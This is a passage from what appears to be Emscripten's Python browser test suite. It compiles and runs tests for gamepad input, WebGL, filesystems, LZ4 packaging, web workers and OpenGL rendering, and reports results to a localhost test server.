# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
# compress in emcc, -sLZ4 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
# Enabling FULL_ES3 also enables ES2 automatically
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
